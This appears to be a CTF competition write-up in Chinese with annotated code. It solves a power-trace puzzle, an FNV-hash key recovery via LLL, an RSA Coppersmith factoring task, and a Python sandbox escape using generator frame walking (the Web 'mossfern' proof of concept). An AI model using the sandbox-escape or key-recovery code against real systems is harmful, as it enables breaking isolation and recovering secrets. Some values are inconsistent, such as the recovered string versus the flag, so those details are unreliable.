Misc
Power Trajectory Diagram
得到npz文件,打开后取范数排序。
import numpy as np
# Open the challenge archive. np.load leaves allow_pickle at its default of
# False, which is the right setting for a downloaded attachment: pickled object
# arrays would otherwise be deserialized when they are read.
archive = np.load("attachment.npz")
idx_arr = archive['index']
input_arr = archive['input']
output_arr = archive['output']  # loaded as in the original; not used below
trace_arr = archive['trace']

# Group the rows by their `index` value, keeping (norm of the trace, input).
# 520 is hard-coded by the write-up; presumably the number of traces in the
# archive.
by_index = {}
for row in range(520):
    by_index.setdefault(idx_arr[row], []).append(
        (np.linalg.norm(trace_arr[row]), input_arr[row])
    )

# For every index (in first-seen order) print the input whose trace has the
# largest Euclidean norm; the printed values are concatenated without
# separators.
for group in by_index.values():
    ranked = sorted(group, key=lambda pair: pair[0])
    print(ranked[-1][1], end="")
得到 ziscn_2034,然后补全爆破即可得到flag。flag{_ciscn_2024}
通风机
搜索mwp文件找到STEP7Micro/WIN。
格式不兼容,在文件头补全GJK即可。
然后得到单层base64的flag。
火锅链观光打卡
直接答题就行
Crypto
hash
python2.7使用fnv算法( https://en.wikipedia.org/wiki/Fowler%E2%80%93Noll%E2%80%93Vo_hash_function ),参考 https://ctf-wiki.org/crypto/hash/fnv/ 。将异或替换成加法后做格基规约,最小规约即为解,于是可以计算key,从而得到flag。
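# Sage script (`^^` is XOR; powers are written `**` throughout).
# It recovers a 7-byte key from a 64-bit hash value by treating each XOR round
# of the hash as an addition with a small error and solving the resulting
# linear relation with LLL. Per the write-up the target is Python 2.7's
# FNV-style hash.
# Takeaway for defenders: a non-cryptographic hash of a short secret does not
# hide that secret, so key material should come from a proper KDF.

a = 1000003                      # hash multiplier
al = [a**i for i in range(8)]    # a**0 .. a**7

# Column weights: a**0 .. a**5 unchanged, then a**6 and 2**7 * a**7 merged into
# a single weight, so one unknown carries both terms.
wl = [al[i] for i in range(6)]
wl.append(2**7 * al[7] + al[6])

m = matrix(ZZ, 9, 9)
x = 7457312583301101235          # presumably the hash value given by the challenge
length = 7
mask = 0xffffffffffffffff
# The original wrote `x ^^ length & mask`, where `&` binds tighter than `^^`.
# x is already below 2**64, so the explicit grouping yields the same value.
x = (x ^^ length) & mask
print(x)
wl.append(-x)

# Lattice basis: column 0 holds the weights scaled by 2**20, followed by an
# identity part that records the coefficient of each row.
for i in range(8):
    m[i, 0] = wl[i] * 2**20
    m[i, i + 1] = 1
m[-2, -1] = 2**8                 # marker entry for the row that carries -x
m[-1, 0] = 2**64 * 2**20         # extra row for the reduction modulo 2**64

for v in m.LLL():
    cr = []
    # Keep the reduced vector that uses the -x row exactly once (up to sign).
    if abs(v[-1]) == 256:
        c = v[1:-1] * sgn(v[-1])
        xx = x
        for ci in c:
            # Undo one multiply-and-add round modulo 2**64 ...
            xx_ = (xx - ci) * inverse_mod(a, 2**64) % 2**64
            # ... and record the value whose XOR gives the same state.
            cr.append(xx ^^ (xx_ * a) % 2**64)
            xx = xx_
        print(cr)
        # Sanity check: the additive relation reproduces x modulo 2**64.
        s = sum(a**i * c[i] for i in range(7)) + a**7 * 2**7 * c[-1]
        s %= 2**64
        assert s == x
        break

msg = 13903983817893117249931704406959869971132956255130487015289848690577655239262013033618370827749581909492660806312017
key = bytes(ci for ci in cr[::-1])
# The print statement that follows calls binascii.hexlify, but the original
# imported only hashlib.
# NOTE(review): that statement XORs with a single `^`, which the Sage preparser
# reads as exponentiation; run it in plain Python or write the XOR as `^^`.
import binascii
import hashlib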
print(bytes.fromhex(hex(msg^int(hashlib.sha384(binascii.hexlify(key)).hexdigest(), 16))[2:]))
古典密码
Atbash加密+base64decode+fence。
OvO
p,q接近且相差不大可以视作一个数。可以解方程得到p,q近似值。
然后利用p近似值可以通过coppersmith攻击得到p,q。
import sympy
# Challenge parameters as printed in the write-up.
n = 111922722351752356094117957341697336848130397712588425954225300832977768690114834703654895285440684751636198779555891692340301590396539921700125219784729325979197290342352480495970455903120265334661588516182848933843212275742914269686197484648288073599387074325226321407600351615258973610780463417788580083967
e = 37059679294843322451875129178470872595128216054082068877693632035071251762179299783152435312052608685562859680569924924133175684413544051218945466380415013172416093939670064185752780945383069447693745538721548393982857225386614608359109463927663728739248286686902750649766277564516226052064304547032760477638585302695605907950461140971727150383104
c = 14999622534973796113769052025256345914577762432817016713135991450161695032250733213228587506601968633155119211807176051329626895125610484405486794783282214597165875393081405999090879096563311452831794796859427268724737377560053552626220191435015101496941337770496898383092414492348672126813183368337602023823

# The exponent is rebuilt at the end of this script as
#     e = 65537 + k*p + r*(p+1)*(q+1) + 1,
# so r is about e // n. The relation k = r - 2 is taken from the write-up.
# Takeaway for defenders: a public exponent that encodes p and q leaks enough
# to factor n.
r_coef = e // n
k_coef = r_coef - 2

# Multiplying that identity by p and substituting p*q = n gives
#     (k + r)*p**2 + (r*n + r + 65537 + 1 - e)*p + r*n = 0.
# NOTE(review): the e above is apparently not the exact exponent (it is
# recomputed below), so the root is only an estimate of p.
sym_x = sympy.symbols('x')
quad = (k_coef+r_coef) * sym_x ** 2 + (r_coef * n + r_coef + 65537 + 1 - e) * sym_x + r_coef * n
p_approx = int(sympy.solve(quad)[1])

# Coppersmith step: look for a correction delta with |delta| < 2**75 such that
# p_approx + delta vanishes modulo a divisor of n of size at least n**0.4.
P.<x> = PolynomialRing(Zmod(n))
lin = x + p_approx
delta = lin.small_roots(X=2**75, beta=0.4)[0]
p = int(p_approx + delta)
assert n % p == 0   # confirms that p really divides n

# With the factorisation known, rebuild the exponent and decrypt as usual.
q = n // int(p)
phi = (p-1)*(q-1)
e = 65537 + k_coef * p + r_coef * ((p+1) * (q+1)) + 1
d = pow(e,-1,phi)
m = pow(c,d,n)
print(bytes.fromhex(hex(m)[2:]))
Web
mossfern
看源代码发现是沙箱逃逸。尝试后发现是利用栈帧的沙箱逃逸。
参考上文内容构造poc可以得到
# Proof of concept from the write-up. It reaches objects outside the code's own
# namespace using nothing but frame attributes, which shows why an in-process
# sandbox that only limits names and builtins is not a security boundary.
# Untrusted code needs process- or OS-level isolation.
def waff():
    def f():
        # Evaluated lazily while the generator runs: yields the frame that is
        # driving the generator at that moment.
        yield generator.gi_frame.f_back
    generator = f()
    # Drain the generator and keep the single frame object it produced.
    frame = [x for x in generator][0]
    # Walk three frames further up the call stack and take `str` from the
    # builtins entry in that frame's globals; the key is assembled from pieces
    # rather than written literally.
    # NOTE(review): the number of f_back hops is specific to the host's call
    # depth and cannot be verified from this page.
    str = frame.f_back.f_back.f_back.f_globals['_'*2+"builtins"+'_'*2].str
    # Print the constants stored in that outer frame's code object, one
    # character per line.
    for i in str(frame.f_back.f_back.f_back.f_code.co_consts):
        print(i)
waff()